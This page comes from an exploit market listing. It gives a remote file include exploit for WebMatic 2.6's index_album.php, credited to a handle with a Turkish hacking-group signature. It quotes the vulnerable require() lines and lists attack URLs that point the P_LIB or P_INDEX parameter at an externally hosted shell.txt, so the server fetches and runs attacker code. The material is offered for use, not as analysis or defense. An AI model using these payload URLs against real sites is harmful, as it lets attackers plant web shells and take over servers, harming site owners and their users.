[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebMatic 2.6 (index_album.php) Remote File Include Vulnerability

Author
MadNet
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1484
Category
web applications
Date add
07-02-2007
Platform
unsorted
================================================================
WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
================================================================



-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --



#  0day.today [2024-12-25]  #